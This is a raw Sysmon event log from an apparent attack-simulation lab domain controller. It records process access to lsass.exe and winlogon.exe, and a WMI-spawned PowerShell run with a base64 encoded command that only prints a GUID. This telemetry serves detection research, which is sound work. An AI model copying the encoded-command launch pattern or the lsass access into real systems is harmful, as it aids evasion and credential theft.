CRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002241750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.156{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EC VwByAGkAdABlAC0ASABvAHMAdAAgADEAYgA2ADEAYQBlADEANAAtADkAZABjADMALQA0AGQAYQBkAC0AYgBhADgANgAtADcAZgA5ADUAMwAxAGEAMwAyADUANAA1AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002243433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.975{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.889{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.875{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.875{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.826{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.826{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002243427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.811{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200\PSHost.132591776836737364.8200.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002243426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.795{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_c1tt4oyo.xvw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.795{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zuu1wlch.ipx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77510BF0D48C11E6CE147A43746F0AFB,SHA256=313A3DD69EC000058A6CE1A9540E0C3041E6C89B6CDAC795870E9BB178D9C232,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:33.662{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58465- 354300x80000000000000002243422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:33.350{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60156-false10.0.1.12-8000- 10341000x80000000000000002243421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.775{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.775{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.775{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002243418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.775{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zuu1wlch.ipx.ps12021-03-02 16:54:43.775 10341000x80000000000000002243417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.767{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E3AA-00000000AD01}3580C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E1AA-00000000AD01}9004C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc